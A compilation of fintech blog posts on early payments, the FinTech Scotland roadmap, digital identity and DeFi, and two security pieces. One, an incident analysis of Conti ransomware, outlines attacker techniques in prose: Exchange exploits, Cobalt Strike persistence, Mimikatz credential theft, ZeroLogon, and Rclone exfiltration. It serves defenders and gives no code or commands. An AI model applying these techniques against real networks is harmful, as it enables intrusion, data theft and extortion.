Why early payments could be the key to strengthening supply chains

Why early payments could be the key to strengthening your supply chain

Having a strong supply chain is one of the most powerful tools you can have in your arsenal. Creating a solid network of all the organisations involved in delivering your product or service to your end customer ”“ from vendors to producers, warehouses to retailers ”“ is critical to keeping things running smoothly. In fact, it can make or break your success.

But if there’s one factor that can help boost and strengthen supply chains, across all sectors and industries, that often gets overlooked, it’s the power of early payments.

Here’s why they could be the key to making your supply chain even stronger.

Building confidence and trust

It might sound simple, but don’t under-estimate the importance of having confidence in and being able to trust each and every member of your supply chain. Early payments can help build this confidence ”“ for both suppliers and customers alike.

If you’re a buyer, offering to pay early (for example in return for a small discount), signifies that you’ve got the cash ready and waiting, and are considerate of the fact that your supplier might benefit from a boost to their cash flow before the date their invoice is due.

For suppliers, being able to incentivise your customers to pay early by offering a small discount signals sound financial wellbeing. If you’re able to offer your services or products at a beneficial cost, it implies you’re not stretched to the last penny ”“ which gives customers confidence and reassurance that you’re not at risk and they’ll be able to keep buying from you.

Access to better deals

It goes without saying that, if early payment benefits both buyer and supplier, there could be great deals attached to paying up early. When either side is empowered to use early payment as a tool for negotiation ”“ whether that’s a reduction in price, a speedier delivery, or another mutually agreed benefit ”“ it can help move things along exponentially, and might even lead to longer term process changes in your supply chain that keep things really efficient and effective.

Reputation builder

If you’re a buyer that’s offering to pay early, you’re going one step further than avoiding a reputation as a nightmare customer that your supplier has to keep chasing: you’ll become a preferred choice.

When suppliers are stretched or at capacity, they’ll be in a position to choose who they work with. Customers or buyers with good reputations for paying on time (or, even better, early) are much more likely to make their way up the food chain of preference ”“ and might even attract more suppliers looking to work with them, as a result of word of mouth, too.

Growth on both sides

It’s no secret that, for the SMEs and start-ups that form a bulk of the UK’s suppliers, cash is king. Offering early payment can be a real cash injection that helps SMEs out with their cashflow. And good cashflow means more money to invest and grow.

But the benefits aren’t one sided. If you’re a buyer that’s looking to grow, you’ll need your suppliers to be able to keep up with your ambitions ”“ which will likely lead to an increased demand for goods or services. By paying them early and helping them grow, you’ll be helping them to help you grow, when the time comes.

Only as strong as your weakest link

When it comes down to it, your supply chain is only as strong as its weakest link ”“ and late payment has a habit of breaking the bonds that the chain relies on. In fact, according to a recent survey of 500 UK decision makers, 86% agreed that one single late payment affects everyone in the supply chain. And, out of the 31% of businesses that admitted paying a supplier late, almost half say it was due to a late or failed payment from their customer.

So, if late payment has a knock-on, negative impact on everyone in a supply chain, imagine the knock-on, positive impact that early payment could have, if things were reversed?

How Early Pay can help

If reading this has convinced you that building early payment into your supply chain is something you should be looking at, you’re in the right place.

Our CEO, Anthony Persse, thinks it’s time to turn the conversation about late payment on its head: “By shifting towards a more positive conversation about early payment’, we will do much more than simply improve payment performance. We will help create more jobs, deliver greater levels of investment and generate deeper social value with long-term sustainability at a time when the country needs it most.”

If you’d like more information visit saltare.io, or please get in touch with the team at Info@saltare.io and we’ll be happy to help.

Mars mission technology can improve team meetings for introverts

Recruiting a cognitively diverse workforce is essential for productivity, creativity and innovation. People who think differently, however, also prefer to communicate differently in the workplace, too. Introverts, for example, typically prefer to take time to think before contributing. Introverts think to talk whereas extroverts talk to think. So in a normal meeting, whether virtual or face to face, the microphone will tend to be dominated by the more extroverted team members and most of the good ideas from the more introverted team members will be lost.

Our approach to this problem has been to create a workplace collaboration tool for remote meetings using technology developed for astronauts in future deep space exploration missions, successfully tested with NASA and the UK space agency.

Mars is always at least 150 times further away than the Moon and sometimes over 1,000 times further away. The distances are so vast that the radio waves or lasers which will carry the signals will take many minutes to cross the void. The delay will vary with distance but for a crew on Mars it will always be over 3 minutes one-way delay and sometimes over 20 minutes.

The delay cannot be reduced – that is set by the laws of physics – but by splitting dialog into different threads, or braids, and presenting them in a novel way we can make it feel to spaceflight crew and mission control that they are communicating normally.

Using the novel structure and rhythm required for effective remote communication in deep space also produces the opportunity for a new way of interacting during team meetings on Earth. Every participant has an exactly equal chance to contribute to the discussion. Lessons learned from developing human deep space communication technology have the potential to redesign workplace practices to be more inclusive for introverts and other groups, delivering better, more effective, meetings, benefitting the whole team and broader organisation.

For more information, please visit braided.space

Financial Regulation ”“ the opportunity for FinTech Research & Innovation

Article written by Julian Wells, Director at Whitecap Consulting

FinTech Scotland recently published its 10 year Research & Innovation Roadmap. Whitecap worked in partnership with the FinTech Scotland team to support the development of this roadmap, and is discussing the key outputs in a series of blogs. This blog focuses on Financial Regulation, which is one of the four key strategic priority themes.

The UK’s approach to financial regulation has been key in enabling a dynamic financial services sector that supports and drives the economy, enables a progressive economic outlook, creates jobs, and plays a significant role as a global financial service centre.

The development of this Roadmap highlighted financial regulation as a priority theme because of its fundamental role in FinTech and financial services, as well as the need for financial regulation to support the positive role FinTech innovation could play in the future of finance.

Regulation remains extremely complex for all those operating in the finance industry. Depending on the complexity of the financial institution’s business model, meeting compliance obligations can mean significant costs.

Industry research suggests that some of the largest global financial institutions are spending up to 5% of revenue on regulatory compliance. Across the UK this could mean the annual cost of demonstrating regulatory compliance is as much as £6.6 billion.

Throughout the development of the Roadmap, contributors highlighted their interest in the role technologies could play in future financial regulation. Some examples are AI, advanced analytics, high performance computing including quantum computing, and distributed ledger technologies.

Priority areas in Financial Regulation

The industry contributors to this roadmap offered a view that the future looks set for significantly more change. Our analysis highlighted three topics of interest:

Simplifying compliance

Helping financial institutions create new solutions and use FinTech to help meet current, continuously changing, and global regulatory obligations.

Future risk modelling and risk management

Reinventing risk management with technology and data analytics, and enabling new approaches to fight financial crime, address fraud and focus on emerging climate risks.

Reinventing risk management with technology and data analytics
Enabling new approaches to address fraud and fight financial crime
Modelling for new and emerging climate risks

Future regulation design

Enabling an agile regulatory framework that works for all, and developing future regulatory oversight or supervisory technology.

Regulatory reporting
Interoperability and data standardisation

Roadmap next steps: Financial Regulation

A range of proposed next steps are laid out in the published Roadmap, which specifically identifies 13 actions relating to Financial Regulation, and categorises each into one of three phases over the next 10 years. These actions are illustrated in the graphic below. The report also references 23 different stakeholders who can support the implementation of these actions, which are broken down into research projects and innovation calls.

More information about FinTech Scotland’s Research & Innovation Roadmap can be found here, where the full Roadmap can also be downloaded.

The Identity Tooling Needed for Institutional Adoption of DeFi

Blog written by Kai Jun Eer, founder of fintech Onboard ID

In the past year, the term Web3 has become an increasingly used buzzword. The growth in different blockchain protocols and metaverse projects seem to have shed a light on how the new Web3 might look like. We are on the forefront of technology innovation, and we are really excited about it. Yet, it is important to remember that Web3 is not just about crypto and metaverse, but how we define a more user-centric internet. Behind every shining DeFi protocol or NFT project, there is an infrastructural layer supporting them.

Most of the current decentralised finance (DeFi) protocols are pseudonymous in nature (meaning each user is tied to an identifier but not to its real world identity). As these protocols start to grow into institutional adoption, inevitably they will need to comply with certain institutional regulations. One example being some of the users might now need to undergo the Know-Your-Customer (KYC) verification in order to continue interacting with these institutions through the DeFi protocols. I envision that as DeFi matures, the underlying protocol that facilitates the settlement / transactions would be fully decentralised and trustless, while specific use cases can be built on top of the protocol where some might introduce regulations.

A concrete example is Aave, one of the largest DeFi protocols deployed on multiple blockchains such as Ethereum and Avalanche. Aave first started out as a decentralised lending and borrowing protocol. Earlier this year, Aave launched a permissioned protocol (Aave Arc) that targets institutional adoption. The benefits that a blockchain can bring to speed up efficiency of financial settlements do not have to be limited to a fully decentralised setting. However, users that interact with Aave Arc have to undergo KYC in order to meet regulatory requirements.

As more DeFi protocols are becoming more regulated to expand their markets to financial institutions, does that mean that as an end user, each time I want to access a different protocol, I have to undergo a KYC verification again and again? Other than not user-friendly, it makes an already high barrier to entry in DeFi even less accessible.

A digital identity might help. Imagine if an end user only has to undergo the KYC process once, where it receives a digital identity which can be subsequently presented to the different DeFi protocols. With increasing awareness of data privacy and data ownership, users want to be in control of their own data. As an end user, I no longer want to delegate my identity data to a centralised data custodian (think Google ID), especially sensitive data such as what financial services I am accessing. There is a need for a privacy-preserving identity solution, which provides convenience yet still user-centric.

At Onboard ID, we are building the next generation identity tooling, where users are always in control of their own data. Once a user has undergone the usual KYC verification, it receives a cryptographic digital credential which contains the user’s verified identity data. The identity data is only stored in the user’s mobile phone and not in any central databases. An identifier of the credential is recorded on a public permissionless blockchain, such that when the user presents its credential, it is verifiable that the identity data in the credential comes from the trusted KYC provider. The reason our solution is user-centric is that during KYC reverification, data transfer only happens between the user and the verifier without passing through any third parties, not even us as the infrastructure provider. Therefore, users are always in control of how they want to share these data and with whom.

We are currently in beta testing. If your organisation is looking to get an edge in streamlining KYC reverifications, whether it’s in the fintech sector, looking to get into DeFi, or other more specific use cases, please get in touch at kaijuneer@gmail.com! Our vision is to contribute towards building a more user-centric internet, and we hope you could come onboard with us.

Protecting your tech startup against Conti type ransomware

Blog written by Alex Jessop, Managing Security Consultant (CIRT) at NCC Group

Background

March saw a 53% increase in ransomware attacks on February, continuing the upward trend for 2022. Conti were the second most prolific group, responsible for 27.52% of the ransomware attacks occurring worldwide^[1]. FS-ISAC, in their “Navigating Cyber 2022” report, stated that with the observed trends over recent years, ransomware will remain a top cyber threat to financial institutions^[2].

Conti are just another in a long line of Advanced Persistent Threat (APT) actor groups that are targeting organisations for monetary gain. While their arsenal may have some custom tooling, the majority of the Tactics, Techniques and Procedures (TTPs) are well known and used by multiple APT groups. A large proportion of incidents observed by NCC Group would have easily been prevented if policies had been followed or proactive measures taken to understand weaknesses in the environment.

Taking the following three steps will drastically reduce the likelihood of a successful compromise:

Robust patch management policy
- The majority of initial access vectors observed in Conti attacks would be mitigated
Enforcing principle of least privilege^[3]
- Restricting user permissions would reduce the likelihood of post-exploitation if initial access is gained
Restricting internet access on servers
- Connectivity is key to threat actors and would make a compromise substantially more difficult if the server estate could not communicate openly with the internet

Executive Summary

In February 2022, a Twitter account which uses the handle ContiLeaks’, started to publicly release information for the operations of the cybercrime group behind Conti ransomware. The leaked data included private conversations between members along with source code methods of delivery. Furthermore, even though the leaks appeared to have a focus on the people behind the Conti operations, the leaked data confirmed (at least to the public domain) that the Conti operators are part of the group, which operates under the TheTrick’ ecosystem. For the past few months, there was a common misconception that Conti was a different entity.

Despite the public disclosure of their arsenal, it appears that Conti operators continue their business as usual by proceeding to compromise networks, exfiltrating data and finally deploying their ransomware. The aim of this article is to describe the methods and techniques we observed during recent incidents that took place after the leaked data.

Our findings can be summarised as below:

Multiple different initial access vectors have been observed.
The operator(s) use service accounts of the victim’s Antivirus product in order to laterally move through the estate and deploy the ransomware.
After getting access, the operator(s) attempted to remove the installed Antivirus product.
To achieve persistence in the compromised hosts (maintain access), multiple techniques were observed;
- Service created for the execution of Cobalt Strike.
- Multiple legitimate remote access software tools found. These include AnyDesk’, Splashtop’ and Atera’.
  - Local admin account Crackenn’ created. (Note: This has been previously reported by Truesec as a Conti behaviour^[4])
- Before starting the ransomware activity, the operators are known to have exfiltrated data from the network with the legitimate software Rclone’^[5].

It should be noted that the threat actor(s) might use different tools or techniques in some stages of the compromise.

Initial Access

Multiple initial access vectors have been observed recently; phishing emails and the exploitation of Microsoft Exchange servers. The phishing email which was delivered to an employer proceeded to download and install malware which gave the threat actor direct access to the host.

The targeting of Microsoft Exchange saw ProxyShell and ProxyLogon vulnerabilities exploited. This gave threat actors direct access to the Exchange servers. When this vector was observed, the compromise of the Exchange servers often took place two to three months prior to the post exploitation phase.

Other initial access vectors utilised by the Conti operator(s) are:

Credential brute-force
Use of publicly available exploits. We have observed the following exploits being used:
- FortiGate VPN
- Log4Shell
Phishing e-mail sent by a legitimate compromised account, including email accounts of trusted partners

Discovery and Lateral Movement

Once a threat actor has gained access to a host on the network, the threat actor deploys tooling or executes Windows commands to identify hosts on the estate and potential pathways to their objectives.

Typically they begin with network scanning tools to build a picture of the estate and identify what is accessible from the host they currently have access to. Next they will use Windows domain discovery tools to identify users on the domain, as well as user groups which will assist in escalating their privileges .

Lateral movement is usually performed by either:

Use of Remote Desktop Protocol (RDP) to log onto hosts remotely
Access across open network shares to copy and execute malware

This phase often occurs within hours or days of initial access being gained.

Persistence

The threat actor leveraged Windows Services to add persistence for the Cobalt Strike beacon. Cobalt Strike is a popular tool for adversary simulation and was the main command and control framework utilised by this group.

In addition, services were also installed to provide persistence for the Remote Access Tools deployed by the threat actor:

AnyDesk
Splashtop
Atera

Local accounts have also been created by the threat actor on patient zero to maintain access.

Privilege Escalation

Conti operator(s) managed to escalate their privileges by compromising and using different accounts that were found in the compromised host. The compromised credentials in engagements undertaken by NCC were found to be compromised through the use of tools such as Mimikatz, which is a well-known tool to extract credentials from running processes.

One operator was also observed exploiting ZeroLogon to obtain credentials and move laterally.

Exfiltration and Encryption

Similar to many other threat actors, Conti operator(s) exfiltrate a large amount of data from the compromised network using the legitimate software Rclone’. Rclone’ is a legitimate file transfer tool which is used to manage files on cloud storage or a private file server. When cloud storage is used, Mega is the option chosen by this group.

Soon after the data exfiltration, the threat actor(s) started the data encryption. In addition, we estimate that the average time between the lateral movement and encryption is five days.

As discussed previously, the average dwell time of a Conti compromise is heavily dependant on the initial access method. Those incidents that have involved ProxyShell and ProxyLogon, the time between initial access and lateral movement has been three to six months. However once lateral movement is conducted, time to completing their objective is a matter of days.

Recommendations

Monitor firewalls for traffic categorised as filesharing
Monitor firewalls for anomalous spikes in data leaving the network
Patch externally facing services immediately
Monitor installed software for remote access tools
Restrict RDP and SMB access between hosts
Implement a Robust Password Policy^[6]
Provide regular security awareness training

References

Photo by Tima Miroshnichenko: https://www.pexels.com/photo/people-typing-on-keyboards-5380596/

Payments & Transactions, the fintech opportunity

Article written by Julian Wells, Director at Whitecap Consulting

FinTech Scotland recently published its 10 year Research & Innovation Roadmap. Whitecap worked in partnership with the FinTech Scotland team to support the development of this roadmap, and

is discussing the key outputs in a series of blogs. This blog focuses on Payments & Transactions, which is one of the four key strategic priority themes.

The way we pay for things is changing. Throughout the development of the Research & Innovation Roadmap, payments and transactions were referred to in the broad context of the transfer of value (either money, goods, or assets) in exchange for goods and services.

The Roadmap pinpoints the significant move from physical exchanges to digital transactions, and identifies several significant trends that could mean payments will change significantly in years to come. These changes will have a significant impact on the economy, and could also have a substantial impact on citizens and businesses, which is why the future of payments is one of the four priority themes identified.

The importance of Payments & Transactions

The pandemic accelerated the move from physical to digital in many aspects of our lives, including how we make transactions. Customers’ digital expectations and a shift towards more instant electronic payments are having a significant impact on our economy, and a new digital economy is emerging strongly, with major implications for consumers and SMEs alike.

Across the development of the Roadmap, when looking at the theme of the future payments we considered the topic of digital currencies and crypto currencies. These innovations present new ways for value to be stored and exchanged. It is clear there is a still a lot to learn about the potential, the impact, and the implications of cryptocurrencies as a method for mainstream payments. Stablecoin is a form of cryptocurrency that is linked to an asset that is stable in value, and stablecoins are generating significant interest for future payments and value exchange.

The UK Government has established a crypto assets taskforce, and the UK regulators are considering the benefits and risks on a range of issues connected to this topic, including a separate digital currency backed by a central bank. Since the publication of the Roadmap, HM Treasury has confirmed its commitment to the development of appropriate regulation for crypto.

As we further explored the payments theme, we identified technologies of particular interest, such as AI, blockchain and distributed ledger tools. Industry expressed interest about how these technologies could offer a completely different way to organise and manage payment systems, providing a route to real-time, cross-border payments worldwide. These developments pave the way for a potentially very different future of value exchange. According to the World Economic Forum, up to 10% of global GDP could be stored on blockchains by 2025.

Embedded payments is one of the hottest topics in FinTech in 2022, and was another area of particular focus. Technology is advancing the methods to embed payments in everyday experiences and allow customers and businesses to pay for purchases without entering bank details, credit, or debit card information.

Historically, the payments process has lived at the edges of experience for businesses. Payments were either taken in cash, or offline, with no real lasting insights into the customer and the goods or services they purchased. Technology businesses are now fully embedding software that enables a change to this experience, creating more choice and allowing businesses to have a deeper connection with customers. In addition to high profile examples such as Uber, many embedded payment innovations are emerging, such as in-car payments, smart fridges and connected homes.

Priority areas in Payments & Transactions

The industry contributors to this roadmap offered a view that the future looks set for significantly more change. Our analysis highlighted three topics of interest:

Digital currencies

Potential new ways to pay and transact in the future, with underlying technologies that could provide new foundations for the future of value exchange:

Cryptocurrencies and stablecoins
Distributed ledger technology

Embedded payments

Integrating frictionless payments into everyday activities, enabled by smart technology, and potentially driven by changing consumer expectations:

SME market
Retail consumers

Security for digital payments

Building security, trust, and user protection through cyber security, protecting users from malicious activity, reducing the potential for financial crime, and promoting a secure and trusted digital payment environment:

Cyber security
Biometrics

Roadmap next steps: Payments & Transactions

A range of proposed next steps are laid out in the published Roadmap, which specifically identifies 10 actions relating to Payments & Transactions, and categorises each into one of three phases over the next 10 years. These actions are illustrated in the graphic below. The report also references 23 different stakeholders who can support the implementation of these actions, which are broken down into research projects and innovation calls.

More information about FinTech Scotland’s Research & Innovation Roadmap can be found here, where the full Roadmap can also be downloaded.

MyIdentity and Improving Identity Verification

Department for Digital, Culture, Media and Sport (DCMS) and the Digital Identity & Attributes Trust Framework (DIATF)

The Government wants to improve how digital identity is done and demonstrate what a good’ digital identity should look like. As such, the DCMS has made a number of commitments to create a framework for what a good digital identity should look like. They will establish a Governance function to own these rules and make sure that they are followed and develop proposals to remove legislative and regulatory blockers’ for the use of secure identities, whilst ensuring the protection of citizens.

Underneath the DIATF are a number of identity schemes. Each aligned to the DCMS Framework and working to ensure interoperability, as each scheme will have their own nuances to meet the specific needs of its sector.

Etive have been working on the design and development of a scheme for the home buying and selling process since 2018, followed by two rounds of public funding, first from Scottish Enterprise and then Innovate UK.

Is there a problem with identity in the home buying and selling process?

The home buying and selling process is a long transaction built on trust between relying parties – estate agents, conveyancers, brokers and lenders. Each is regulated differently and works to often competing standards and consequently each is not allowed to trust and rely on the identity verification (IDV) carried out by the other.

This has resulted in consumers having to prove their identity up to 5 times through the process, often using different information at different times. This causes great frustration, friction and cost for consumers, as well as relying parties. As one consumer responded, ID checks are currently a joke, I have provided 12 different forms of ID and problems with them all’.

We should also not forget that due to events since 2020, with less face-to-face interactions, there is a greater reliance on digital IDV methods and property and mortgage fraud continues to rise.

MyIdentity Trust Scheme & Regulations

The solution is the development of a trust scheme enabling a consumer to get the IDV done once, which they own, and can share to all relying parties.

The MyIdentity scheme is based on the principles of the DCMS Framework and the Good Practice Guide 45 (GPG45; How to prove and verify someone’s identity). To ensure compliance with Anti-Money Laundering (AML) and compliance for firms, AML regulations were updated in 2019 enabling firms to use an IDV carried out by a certified third party so long as ”¦it is accredited or certified to offer the identity verification service through a governmental or industry process that involved meeting minimum published standards’.

These third parties are identity service providers (IDSPs) and since January 2022 approximately 45 organisations are going the DCMS certification process. Liability has also shifted onto these IDSPs.

Financial Services and MyIdentity

The MyIdentity scheme is participating in the FCA’s regulatory sandbox, enabling firms to test innovative offerings in a live environment and provides FCA regulated firms with the protections that they need to embrace the Government and MyIdentity standards.

MyIdentity is also working through UK Finance to work to get MyIdentity into a position that lenders will accept a MyIdentity IDV and how financial organisations can re-use these IDV’s for all financial services, a re-usable identity, a DCMS objective.

Further work is being done to help remove the blockers for other cohorts involved in the sales process such as conveyancers and brokers who rely on the lender’s handbooks’ from both UK Finance and the Building Societies Association (BSA).

MyIdentity Outcomes

The Beta stage of the project is testing processes and technology looking at improved IDV standards, regulation of providers and greater protections for consumers and the industry.

If we look at Norway, for example, when they developed their trust network, BankID, fraud reduced from 2% of financial transactions to 0.00042% and mortgage lending times reduced to 1 day.

Great work is being done by the industry, coming together, to help improve the process of home buying and selling, also a policy objective of The Department for Levelling Up, Housing and Communities (DLUCH).

FinTech Research & Innovation for Climate Finance

FinTech Scotland recently published its 10 year Research & Innovation Roadmap. Whitecap worked in partnership with the FinTech Scotland team to support the development of this roadmap, and is discussing the key outputs in a series of blogs. This blog focuses on Climate Finance, which is one of the four key strategic priority themes.

The impact of climate change across the world is disrupting national economies and affecting lives. It requires urgent action from all to address the growing issue.

In its 2020 Global Risks report, the World Economic Forum highlights that the risk signals show the horizon for addressing climate risks has shortened. For the first time in the history of the report, the top five risks that it outlines are in a single category: climate environmental change’

In the Research & Innovation Roadmap, we use the term Climate Finance to describe the role that finance, technology and data can play in addressing the climate change crisis and powering a sustainable future.

The importance of Climate Finance

Enabling a more sustainable future was a prominent theme throughout the research for the development of the Roadmap. Throughout our analysis, the influence of finance together with the potential for exponential change through technologies was thought to be a powerful combination to help the necessary transition to a carbon neutral economy.

In the UK, financial regulators are aiming to influence positive climate outcomes through a series
of new expectations, rules and guidance. The Bank of England is working to encourage an early and orderly transition to a carbon neutral economy and to “play a leading role, through policies and operations, in ensuring the financial system, the macroeconomy, and the Bank are resilient to the risks from climate change and supportive of the transition to a net zero economy.”

The Financial Conduct Authority also has a sustainable finance strategy, aiming to build greater transparency and trust, developing guidance and tools to provide mutual support to address the challenges of climate change.

Climate Finance is a complex matter. Our research with FinTech Scotland showed that it connects many things, including:

Investment
Regulatory change
Better data
Advanced analytics
A deeper understanding of consumer behaviours and consumer engagement
A deeper understanding of new technologies, biodiversity, carbon, and carbon markets

The challenge ahead is huge. Nevertheless, the research behind the Roadmap pinpointed three priority areas where further FinTech research and innovation could advance progress by helping nations adapt to the impact of climate change, manage the risks of transition and lead to them becoming greener, more resilient and more inclusive. All three offer Scotland and the UK an opportunity to use strengths in research and innovation, and to build collaborative action across the FinTech and finance industry and the research community.

Priority areas in Climate Finance

Environment, Social, Corporate Governance (ESG) data.

Assessing the current situation and outlining the ambition for new data sources, clearer standards and advanced analytics to build greater trust and transparency in the sustainable claims made by finance and business.

ESG reporting
Investor confidence
ESG data
SME market

Carbon markets and carbon offsetting

Considering the role that each plays in realistically transitioning to a net zero low-carbon economy while exploring the technologies and innovation that could drive further progress.

Voluntary carbon markets
Carbon offsetting

Facilitating a net zero economy

Moving beyond finance-as-usual practices. Using innovation and technology to reinvent financial markets and stimulate the change needed to support a healthier planet.

Investment decisions for net zero
Circular economy
Housing
Insurance
SME market

Roadmap next steps: Climate Finance

A range of proposed next steps are laid out in the published Roadmap, which specifically identifies 8 actions relating to Climate Finance, and categorises each into one of three phases over the next 10 years. These actions are illustrated in the graphic below. the report also references 25 different stakeholders who can support the implementation of these actions, which are broken down into research projects and innovation calls.

More information about FinTech Scotland’s Research & Innovation Roadmap can be found here, where the full Roadmap can also be downloaded.

Research & Innovation opportunity in Open Finance data

Article written by Julian Wells, Director at Whitecap Consulting

FinTech Scotland recently published its 10 year Research & Innovation Roadmap. Whitecap worked in partnership with the FinTech Scotland team to support the development of this roadmap, and is discussing the key outputs in a series of blogs. This blog focuses on Open Finance data, which is one of the four key strategic priority themes.

In the first blog in this series, we discussed the purpose, value and impact of a Research & Innovation Roadmap. In this blog, we discuss Open Finance data which is a strategic priority itself but also a facilitator of FinTech innovation in wider areas, and an enabler for the three other strategic priority themes in the Roadmap.

The other three themes are Climate Finance, Payments & Transactions, and Financial Regulation, each of which will be the subject of a subsequent blog in this series.

Open Finance data has the potential to significantly change consumers’ and businesses’ engagement with finance, and to deliver better outcomes. It spans the whole suite of financial products and services as we understand them today, including banking, savings, mortgages, pensions, investments, insurance, lending, and payments.

How can Research & Innovation support the development of Open Finance?

To help Open Finance achieve its potential, more leadership, actionable research, and innovation is required. FinTech Scotland’s Research & Innovation Roadmap sets out specific actions to help drive this opportunity ”“ through a collective approach that involves industry, innovators and researchers ”“ to create the future of finance.

Open Finance can create progressive change that will move the UK forward significantly, by moving beyond banking and asking other financial institutions (such as pension providers, asset managers and insurers) to enable customers to share their data with others.

This would open up a wider range of financial products and services to the transformative impact of third-party innovation through trusted data sharing. For consumers and businesses, it offers new ways to understand their finances, receive financial advice, and compare financial product features and prices.

Research and innovation are needed to facilitate the potential of Open Finance data, building economic growth and creating employment opportunities in high value sectors which in turn will make the UK an attractive destination for inward investment.

Furthermore, it will help us better understand, measure, and forecast the considerable impact that Open Finance could have on society and to shape future policy.

In the UK, one of the key enablers of research and innovation in Open Finance is the Smart Data Foundry (formerly The Global Open Finance Centre of Excellence), which has been established in Edinburgh to support the understanding and development of the capabilities of Open Finance. It has a leadership role in enabling the necessary research and innovation, and building confidence in Open Finance across the UK, and can encourage research and innovation by providing a highly secure environment that can host Open Finance data. The Open Finance data priority in FinTech Scotland’s Research & Innovation Roadmap supports and complements The Smart Data Foundry’s agenda.

Priority areas in Open Finance data

When developing the Roadmap, analysis highlighted three industry priorities that will benefit from more focused research and innovation on this topic. They involve shaping the future of:

Everyday personal banking and business banking

Insights through Open Banking data
Future banking business models

Long-term savings and investment

Financial resilience and wellbeing
Future living & the ageing population

Personal and business insurance

New data and insights for insurance
Data privacy
Data ethics and governance

Roadmap next steps: Open Finance data

A range of proposed next steps are laid out in the published report, which specifically identifies 22 actions relating to Open Finance, and categorises each into one of three phases over the next 10 years. These actions are illustrated in the graphic below. the report also references 23 different stakeholders who can support the implementation of these actions, which are broken down into research projects and innovation calls.

Why should tech companies care about double fetch vulnerabilities?

Fintech companies are facing an increasing need to focus on cybersecurity. Whilst cyber-attacks are on the rise and necessitate the constant evolution of cyber-security solutions, very often the issues arise from known vulnerabilities within existing systems.

In this blog we’re exploring double fetch vulnerabilities.

The phrase ‘double fetch bug’ was first used by Fermin J. Serna in a post on the Microsoft Security and Defense Blog in October 2008, although the bug type had been known about for some time before this.

Double fetch vulnerabilities in C and C++ have been known about for a number of years. However, they can appear in multiple forms and can have varying outcomes.

As much of this information is spread across various sources, the whitepaper, draws the knowledge together into a single place, in order to better describe the different types of the vulnerability, how each type occurs, and the appropriate fixes.

There are two broad general types of double fetch vulnerability: those resulting from coding practices and those introduced by compiler optimization, referred to as a ‘compiler introduced double fetch’ below and in the whitepaper.

The two types of double fetch bug both have the same result, whereby an invariant exists involving two or more variables and one or more of these variables is modified without the invariant being enforced.

Since double fetch bugs can have varying causes, we must consider different solutions for the two different subtypes of double fetch.

Double fetch bugs caused from accessing shared memory may be fixed by adding a check against the second fetch, eliminating the second fetch (where practical), or performing the check in a different manner.
For compiler-introduced double fetches, the use of volatile variables is one possible solution to the double fetch problem.

In conclusion, double fetch bugs can result in privilege escalation vulnerabilities that can allow an attacker with a low privilege account to execute code with elevated privileges, although the exploitable vulnerabilities are a relatively small subset of these bugs.

To understand how to best protect yourself against these vulnerabilities, click here to access the full whitepaper from NCC.